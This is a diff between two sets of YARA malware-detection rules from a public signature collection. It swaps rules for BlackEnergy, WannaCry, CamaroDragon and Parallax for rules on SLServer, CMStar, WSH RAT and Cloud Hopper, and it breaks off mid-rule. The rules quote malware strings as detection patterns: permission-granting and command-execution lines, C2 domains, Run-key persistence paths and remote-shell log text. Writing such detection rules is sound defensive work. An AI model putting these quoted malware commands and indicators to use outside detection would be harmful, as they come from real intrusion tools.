-		reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L140-L163"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L138-L158"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "273a00de7af1b7490bff2eae545b358a5483bae0d55a560bef7bd9fa24b0f1d9"
+		logic_hash = "9bf3c6c93e77424463e3fb6f9f4d58e80254866462fe1287293b0a357737da20"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "7874a10e551377d50264da5906dc07ec31b173dee18867f88ea556ad70d8f094"
-		hash2 = "b73777469f939c331cbc1c9ad703f973d55851f3ad09282ab5b3546befa5b54a"
-		hash3 = "edb16d3ccd50fc8f0f77d0875bf50a629fa38e5ba1b8eeefd54468df97eba281"
-		hash4 = "ac13b819379855af80ea3499e7fb645f1c96a4a6709792613917df4276c583fc"
-		hash5 = "7a393b3eadfc8938cbecf84ca630e56e37d8b3d23e084a12ea5a7955642db291"
-		hash6 = "405013e66b6f137f915738e5623228f36c74e362873310c5f2634ca2fda6fbc5"
-		hash7 = "244dd8018177ea5a92c70a7be94334fa457c1aab8a1c1ea51580d7da500c3ad5"
-		hash8 = "edcd1722fdc2c924382903b7e4580f9b77603110e497393c9947d45d311234bf"
 
 	strings:
-		$s1 = "USB MDM Driver" fullword wide
-		$s2 = "KdDebuggerNotPresent" fullword ascii
-		$s3 = "KdDebuggerEnabled" fullword ascii
+		$mutex = "M&GX^DSF&DA@F"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 180KB and all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $mutex
 }
-rule SIGNATURE_BASE_Blackenergy_Driver_AMDIDE : FILE
+rule SIGNATURE_BASE_Slserver_Command_And_Control : FILE
 {
 	meta:
-		description = "Black Energy Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e5b57c33-87f7-5411-995c-384e0afa0348"
-		date = "2016-01-04"
+		description = "Searches for the C2 server."
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "e4fcda6c-1c9f-5b58-8b07-8d1a0dc4eaf6"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_blackenergy.yar#L165-L188"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L160-L180"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "cb6017327be464bcc2d9efca676c58a9ede45d122460bc167f87e78880c4ace5"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		super_rule = 1
-		hash1 = "32d3121135a835c3347b553b70f3c4c68eef711af02c161f007a9fbaffe7e614"
-		hash2 = "3432db9cb1fb9daa2f2ac554a0a006be96040d2a7776a072a8db051d064a8be2"
-		hash3 = "90ba78b6710462c2d97815e8745679942b3b296135490f0095bdc0cd97a34d9c"
-		hash4 = "97be6b2cec90f655ef11ed9feef5b9ef057fd8db7dd11712ddb3702ed7c7bda1"
-		hash5 = "5111de45210751c8e40441f16760bf59856ba798ba99e3c9532a104752bf7bcc"
-		hash6 = "cbc4b0aaa30b967a6e29df452c5d7c2a16577cede54d6d705ca1f095bd6d4988"
-		hash7 = "1ce0dfe1a6663756a32c69f7494ad082d293d32fe656d7908fb445283ab5fa68"
+		logic_hash = "48a13d27b7dc9a7f3a65752142b2a291e7c3ee93ef67b36aa4202d065e74d80e"
+		score = 75
+		quality = 85
+		tags = "FILE"
 
 	strings:
-		$s1 = " AMD IDE driver" fullword wide
-		$s2 = "SessionEnv" fullword wide
-		$s3 = "\\DosDevices\\{C9059FFF-1C49-4445-83E8-" wide
-		$s4 = "\\Device\\{C9059FFF-1C49-4445-83E8-" wide
+		$c2 = "safetyssl.security-centers.com"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $c2
 }
-rule SIGNATURE_BASE_Wannacry_Ransomware : FILE
+rule SIGNATURE_BASE_Slserver_Campaign_Code : FILE
 {
 	meta:
-		description = "Detects WannaCry Ransomware"
-		author = "Florian Roth (Nextron Systems) (with the help of binar.ly)"
-		id = "2e46b4db-8c94-53ed-ae27-31dd37b04940"
-		date = "2017-05-12"
+		description = "Searches for the related campaign code."
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "672f506e-0cc1-5b09-873b-c3d206486bac"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/HG2j5T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L12-L46"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L182-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a652444d7946dbbc4fae76cd01f2e20993999fd1e6fc48a9ac0da57aab87a2da"
+		logic_hash = "fbf53678399b0e14eae6f1bb6594b2aa665f76f10388e492bec2f9101a4dd4b1"
 		score = 75
-		quality = 83
+		quality = 85
 		tags = "FILE"
-		hash1 = "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
 
 	strings:
-		$x1 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii
-		$x2 = "taskdl.exe" fullword ascii
-		$x3 = "tasksche.exe" fullword ascii
-		$x4 = "Global\\MsWinZonesCacheCounterMutexA" fullword ascii
-		$x5 = "WNcry@2ol7" fullword ascii
-		$x6 = "www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com" ascii
-		$x7 = "mssecsvc.exe" fullword ascii
-		$x8 = "C:\\%s\\qeriuwjhrf" fullword ascii
-		$x9 = "icacls . /grant Everyone:F /T /C /Q" fullword ascii
-		$s1 = "C:\\%s\\%s" fullword ascii
-		$s2 = "<!-- Windows 10 --> " fullword ascii
-		$s3 = "cmd.exe /c \"%s\"" fullword ascii
-		$s4 = "msg/m_portuguese.wnry" fullword ascii
-		$s5 = "\\\\192.168.56.20\\IPC$" fullword wide
-		$s6 = "\\\\172.16.99.5\\IPC$" fullword wide
-		$op1 = { 10 ac 72 0d 3d ff ff 1f ac 77 06 b8 01 00 00 00 }
-		$op2 = { 44 24 64 8a c6 44 24 65 0e c6 44 24 66 80 c6 44 }
-		$op3 = { 18 df 6c 24 14 dc 64 24 2c dc 6c 24 5c dc 15 88 }
-		$op4 = { 09 ff 76 30 50 ff 56 2c 59 59 47 3b 7e 0c 7c }
-		$op5 = { c1 ea 1d c1 ee 1e 83 e2 01 83 e6 01 8d 14 56 }
-		$op6 = { 8d 48 ff f7 d1 8d 44 10 ff 23 f1 23 c1 }
+		$campaign = "wthkdoc0106"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 10000KB and ( 1 of ( $x* ) and 1 of ( $s* ) or 3 of ( $op* ) )
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $campaign
 }
-rule SIGNATURE_BASE_Wannacry_Ransomware_Gen : FILE
+rule SIGNATURE_BASE_Slserver_Unknown_String : FILE
 {
 	meta:
-		description = "Detects WannaCry Ransomware"
-		author = "Florian Roth (Nextron Systems) (based on rule by US CERT)"
-		id = "d28d3d76-9c24-5476-9a0c-936c17477d6a"
-		date = "2017-05-12"
+		description = "Searches for a unique string."
+		author = "Matt Brooks, @cmatthewbrooks"
+		id = "00341604-480f-59aa-9c18-009e7b53928e"
+		date = "2016-04-18"
 		modified = "2023-12-05"
-		reference = "https://www.us-cert.gov/ncas/alerts/TA17-132A"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L48-L66"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_between-hk-and-burma.yar#L204-L224"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "8f81c918dc1e2c8ef2e334ae504f88b10aef9e54a64486061d45296d2d738aab"
+		logic_hash = "18d3bb236282c506c161949883722da1cb0af6dd87bf5cb3d4a5b3d90f4a7db0"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "9fe91d542952e145f2244572f314632d93eb1e8657621087b2ca7f7df2b0cb05"
-		hash2 = "8e5b5841a3fe81cade259ce2a678ccb4451725bba71f6662d0cc1f08148da8df"
-		hash3 = "4384bf4530fb2e35449a8e01c7e0ad94e3a25811ba94f7847c1e6612bbb45359"
 
 	strings:
-		$s1 = "__TREEID__PLACEHOLDER__" ascii
-		$s2 = "__USERID__PLACEHOLDER__" ascii
-		$s3 = "Windows for Workgroups 3.1a" fullword ascii
-		$s4 = "PC NETWORK PROGRAM 1.0" fullword ascii
-		$s5 = "LANMAN1.0" fullword ascii
+		$string = "test-b7fa835a39"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and all of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and $string
 }
-rule SIGNATURE_BASE_Wanncry_M_Vbs : FILE
+
+rule SIGNATURE_BASE_SUSP_Unsigned_Googleupdate : FILE
 {
 	meta:
-		description = "Detects WannaCry Ransomware VBS"
+		description = "Detects suspicious unsigned GoogleUpdate.exe"
 		author = "Florian Roth (Nextron Systems)"
-		id = "a8f13bd2-984d-5c8c-ac53-7d442e222850"
-		date = "2017-05-12"
+		id = "2575b882-3526-5c42-9d50-83fb0b7df3f5"
+		date = "2019-08-05"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/HG2j5T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L68-L83"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_google_anomaly.yar#L3-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e4606834535b4cad2e0d4a9bf6519fc4d749422fa4920f91fed9147ccfdff090"
-		score = 75
+		logic_hash = "5e333ac773927e2ed1f6aa4d6bbcb63d67bcc8d18d732a84bb68cb503469b247"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "51432d3196d9b78bdc9867a77d601caffd4adaa66dcac944a5ba0b3112bbea3b"
+		hash1 = "5aa84aa5c90ec34b7f7d75eb350349ae3aa5060f3ad6dd0520e851626e9f8354"
 
 	strings:
-		$x1 = ".TargetPath = \"C:\\@" ascii
-		$x2 = ".CreateShortcut(\"C:\\@" ascii
-		$s3 = " = WScript.CreateObject(\"WScript.Shell\")" ascii
+		$ac1 = { 00 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C
+               00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65
+               00 00 00 47 00 6F 00 6F 00 67 00 6C 00 65 00 55
+               00 70 00 64 00 61 00 74 00 65 00 2E 00 65 00 78
+               00 65 }
 
 	condition:
-		( uint16( 0 ) == 0x4553 and filesize < 1KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and $ac1 and pe.number_of_signatures < 1
 }
-rule SIGNATURE_BASE_Wanncry_BAT : FILE
+
+rule SIGNATURE_BASE_Cmstar_Malware_Sep17 : FILE
 {
 	meta:
-		description = "Detects WannaCry Ransomware BATCH File"
+		description = "Detects CMStar Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "0929f0de-28ac-5534-a6fd-7b131abda011"
-		date = "2017-05-12"
+		id = "d6c9cd7f-06ce-5641-b9b2-c81daf18628d"
+		date = "2017-10-03"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/HG2j5T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L85-L101"
+		reference = "https://goo.gl/pTffPA"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cmstar.yar#L13-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "472c6aa0f1b5229d639ef347ea39947d3fd292cda3c4086e29a19b64daad4f3f"
+		logic_hash = "498b6a3e02cf4979babe6379c2d6b3529d2a28210d44a8ce05aef1acdd325953"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "f01b7f52e3cb64f01ddc248eb6ae871775ef7cb4297eba5d230d0345af9a5077"
+		hash1 = "16697c95db5add6c1c23b2591b9d8eec5ed96074d057b9411f0b57a54af298d5"
 
 	strings:
-		$s1 = "@.exe\">> m.vbs" ascii
-		$s2 = "cscript.exe //nologo m.vbs" fullword ascii
-		$s3 = "echo SET ow = WScript.CreateObject(\"WScript.Shell\")> " ascii
-		$s4 = "echo om.Save>> m.vbs" fullword ascii
+		$s1 = "UpdateService.tmp" fullword ascii
+		$s2 = "StateNum:%d,FileSize:%d" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x6540 and filesize < 1KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( pe.imphash ( ) == "22021985de78a48ea8fb82a2ff9eb693" or pe.exports ( "WinCred" ) or all of them )
 }
-rule SIGNATURE_BASE_Wannacry_Ransomnote : FILE
+rule SIGNATURE_BASE_MAL_Wshrat_Dotnet_Packer_Feb21 : FILE
 {
 	meta:
-		description = "Detects WannaCry Ransomware Note"
-		author = "Florian Roth (Nextron Systems)"
-		id = "65ce8faf-0981-5382-bc15-f094ccaa9f54"
-		date = "2017-05-12"
+		description = "Yara Rule for WSH rat .NET packer of February 2021 "
+		author = "Yoroi Malware ZLab"
+		id = "62e043fc-7d13-5b91-9fdd-e71d91194da2"
+		date = "2021-03-09"
 		modified = "2023-12-05"
-		reference = "https://goo.gl/HG2j5T"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L103-L117"
+		reference = "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wsh_rat.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "da814848f4616166bd7b92fa1d55a54b565fa8e6036cb895e5795448e989a99d"
+		logic_hash = "18159b140c314a00111fb9453e60d19c11633628a4fe2ad8299b839165b39424"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4a25d98c121bb3bd5b54e0b6a5348f7b09966bffeec30776e5a731813f05d49e"
 
 	strings:
-		$s1 = "A:  Don't worry about decryption." fullword ascii
-		$s2 = "Q:  What's wrong with my files?" fullword ascii
+		$a1 = { BE DD 60 8C 34 49 9A 54 D2 40 }
+		$a2 = { 1D D7 24 22 47 A6 B1 A5 }
+		$a3 = { 13 30 03 00 07 00 00 00 01 }
+		$a4 = { 11 02 03 7D 78 00 00 04 2A }
+		$a5 = { A8 8A F4 C8 61 2B CA 07 }
+		$a6 = { 15 AE 5E AB 5A 20 FE B5 56 B4 61 2B BB 06 2A}
 
 	condition:
-		( uint16( 0 ) == 0x3a51 and filesize < 2KB and all of them )
+		uint16( 0 ) == 0x5A4D and 3 of them
 }
-rule SIGNATURE_BASE_APT_Lazaruswannacry : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_1 : FILE
 {
 	meta:
-		description = "Rule based on shared code between Feb 2017 Wannacry sample and Lazarus backdoor from Feb 2015 discovered by Neel Mehta"
-		author = "Costin G. Raiu, Kaspersky Lab"
-		id = "e9dd9750-2366-503a-a879-972dbead6bf3"
-		date = "2017-05-15"
+		description = "Detects malware from Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "28ca64ac-beee-51d9-96d4-a1f6d52823ec"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/neelmehta/status/864164081116225536"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_wannacry.yar#L121-L147"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L10-L26"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9c7c7149387a1c79679a87dd1ba755bc"
-		hash = "ac21c8ad899727137c4b94458d7aa8d8"
-		logic_hash = "8b32f1ea45a346088a18761540df3387997b53ea853f7a53cd292c9224f11209"
+		logic_hash = "1e024767797fb146b92d6e8c549597c0cda7c2f8fb961299a3808b9b2e924666"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		version = "1.0"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "27876dc5e6f746ff6003450eeea5e98de5d96cbcba9e4694dad94ca3e9fb1ddc"
 
 	strings:
-		$a1 = { 51 53 55 8B 6C 24 10 56 57 6A 20 8B 45 00 8D 75
-         04 24 01 0C 01 46 89 45 00 C6 46 FF 03 C6 06 01 46
-         56 E8 }
-		$a2 = { 03 00 04 00 05 00 06 00 08 00 09 00 0A 00 0D 00
-         10 00 11 00 12 00 13 00 14 00 15 00 16 00 2F 00
-         30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00
-         38 00 39 00 3C 00 3D 00 3E 00 3F 00 40 00 41 00
-         44 00 45 00 46 00 62 00 63 00 64 00 66 00 67 00
-         68 00 69 00 6A 00 6B 00 84 00 87 00 88 00 96 00
-         FF 00 01 C0 02 C0 03 C0 04 C0 05 C0 06 C0 07 C0
-         08 C0 09 C0 0A C0 0B C0 0C C0 0D C0 0E C0 0F C0
-         10 C0 11 C0 12 C0 13 C0 14 C0 23 C0 24 C0 27 C0
-         2B C0 2C C0 FF FE }
+		$s1 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+		$s2 = "z{[ZZYUKKKIIGGGGGGGGGGGGG" fullword ascii
+		$s3 = "EEECEEC" fullword ascii
+		$s4 = "IIEFEE" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize < 15000000 and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
 }
-rule SIGNATURE_BASE_MAL_LNX_Camarodragon_Sheel_Oct23 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_2 : FILE
 {
 	meta:
-		description = "Detects CamaroDragon's tool named sheel"
-		author = "Florian Roth"
-		id = "f6f08c0e-236c-5194-9369-da8fdef4aa21"
-		date = "2023-10-06"
-		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_camaro_dragon_oct23.yar#L2-L25"
+		description = "Detects Operation CloudHopper malware samples"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7c0a3d68-5f6b-5491-b0c2-94e8cff478d1"
+		date = "2017-04-03"
+		modified = "2023-01-06"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L28-L57"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b06f645b766a099adb71c144bdced70c130735e75d5be6451f71077c7d3a5d19"
-		score = 85
+		logic_hash = "dff8623c35c83c20fb525209ec9aa5d77b51fa494eb557845a8320c77746c02f"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		hash1 = "7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a"
+		hash1 = "c1dbf481b2c3ba596b3542c7dc4e368f322d5c9950a78197a4ddbbaacbd07064"
 
 	strings:
-		$x1 = "-h server_ip -p server_port -i update_index[0-4] [-r]" ascii fullword
-		$s1 = "read_ip" ascii fullword
-		$s2 = "open fail.%m" ascii fullword
-		$s3 = "ri:h:p:" ascii fullword
-		$s4 = "update server list success!" ascii fullword
+		$x1 = "sERvEr.Dll" fullword ascii
+		$x2 = "ToolbarF.dll" fullword wide
+		$x3 = ".?AVCKeyLoggerManager@@" fullword ascii
+		$x4 = "GH0STCZH" ascii
+		$s1 = "%%SystemRoot%%\\System32\\svchost.exe -k \"%s\"" fullword wide
+		$s2 = "rundll32.exe \"%s\", UnInstall /update %s" fullword wide
+		$s3 = "\\Release\\Loader.pdb" ascii
+		$s4 = "%s\\%x.dll" fullword wide
+		$s5 = "Mozilla/4.0 (compatible)" fullword wide
+		$s6 = "\\syslog.dat" wide
+		$s7 = "NSOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" fullword wide
+		$op1 = { 8d 34 17 8d 49 00 8a 14 0e 3a 14 29 75 05 41 3b }
+		$op2 = { 83 e8 14 78 cf c1 e0 06 8b f8 8b c3 8a 08 84 c9 }
+		$op3 = { 3b fb 7d 3f 8a 4d 14 8d 45 14 84 c9 74 1b 8a 14 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 30KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 900KB and ( 1 of ( $x* ) or 3 of ( $s* ) ) or all of ( $op* ) ) or ( 6 of them )
 }
-rule SIGNATURE_BASE_MAL_LNX_Camarodragon_Horseshell_Oct23 : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Malware_3 : FILE
 {
 	meta:
-		description = "Detects CamaroDragon's HorseShell implant for routers"
-		author = "Florian Roth"
-		id = "9e54745f-146f-50a6-b30f-53aaaa6907b5"
-		date = "2023-10-06"
+		description = "Detects malware from Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "ad1d3b48-d48c-5011-ac51-c8047e1ee8ed"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_camaro_dragon_oct23.yar#L27-L56"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L59-L79"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "73adaa286b345cffd35e6ba017b3204d8818dcaeea8a48ca93959566461ac3ca"
-		score = 85
+		logic_hash = "d15b4c277e2c4dfe300f242e4cc9b217981166191a47939ca437c55391874b5d"
+		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c21eaadf9ffc62ca4673e27e06c16447f103c0cf7acd8db6ac5c8bd17805e39d"
 
 	strings:
-		$x1 = "echo \"start shell '%s' failed!\" > .remote_shell.log" ascii fullword
-		$x2 = "*****recv NET_REQ_HORSE_SHELL REQ_CONNECT_PORT*****" ascii fullword
-		$s1 = "m.cremessage.com" ascii fullword
-		$s2 = "POST http://%s/index.php HTTP/1.1" ascii fullword
-		$s3 = "wzsw_encrypt_buf" ascii fullword
-		$s4 = "body:%d-%s" ascii fullword
-		$s5 = "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident" ascii fullword
-		$s6 = "process_http_read_events" ascii fullword
-		$op1 = { c4 34 42 00 02 30 63 00 40 10 60 00 09 ae 62 00 48 8e 62 00 cc }
-		$op2 = { 27 f4 8c 46 27 f0 03 20 f8 09 00 60 28 21 }
+		$s6 = "operator \"\" " fullword ascii
+		$s7 = "zok]\\\\\\ZZYYY666564444" fullword ascii
+		$s11 = "InvokeMainViaCRT" fullword ascii
+		$s12 = ".?AVAES@@" fullword ascii
+		$op1 = { b6 4c 06 f5 32 cf 88 4c 06 05 0f b6 4c 06 f9 32 }
+		$op2 = { 06 fc eb 03 8a 5e f0 85 c0 74 05 8a 0c 06 eb 03 }
+		$op3 = { 7e f8 85 c0 74 06 8a 74 06 08 eb 03 8a 76 fc 85 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 600KB and ( 1 of ( $x* ) or 3 of them ) or 5 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 600KB and ( all of ( $s* ) and 1 of ( $op* ) ) or all of ( $op* ) ) or ( 5 of them )
 }
-rule SIGNATURE_BASE_MAL_Crime_Win32_Rat_Parallax_Shell_Bin : FILE
+rule SIGNATURE_BASE_Opcloudhopper_Dropper_1 : FILE
 {
 	meta:
-		description = "Detects Parallax injected code"
-		author = "@VK_Intel"
-		id = "6bb337ef-3156-589a-9b2f-fa1b21699433"
-		date = "2020-05-05"
+		description = "Detects malware from Operation Cloud Hopper"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b43ffb7e-1643-5560-8719-9c63582920e7"
+		date = "2017-04-03"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1257714191902937088"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_rat_parallax.yar#L2-L16"
+		reference = "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_op_cloudhopper.yar#L81-L94"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6b8c71cc19ca6f066d27a4e58d9ec347ac51d245308f2c41adf2386242581610"
+		logic_hash = "ee0caf8a08db9a2a83f10178e2ee890b6b0bc6e699ebb3d01fa94fa48c6dfdee"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		tlp = "white"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "411571368804578826b8f24f323617f51b068809b1c769291b21125860dc3f4e"
 
 	strings:
-		$ntdll_load = {55 8b ec 81 ec d0 08 00 00 53 56 57 e8 ?? ?? ?? ?? 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 33 c0 b9 18 01 00 00 f3 ?? 68 02 9f e6 6a e8 ?? ?? ?? ?? 8b d8 68 40 5e c0 84 89 ?? ?? e8 ?? ?? ?? ?? 6a 00 8b f0 68 0b 1c 64 72 53 89 ?? ?? e8 ?? ?? ?? ?? 83 c4 14 89 ?? ?? ?? ?? ?? 8d ?? ?? ?? ?? ?? 68 30 02 00 00 51 ff d0 6a 6e 58 6a 74 66 ?? ?? ?? ?? ?? ?? 58 6a 64 59 6a 6c 66 ?? ?? ?? ?? ?? ?? 58 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 33 c0 6a 2e}
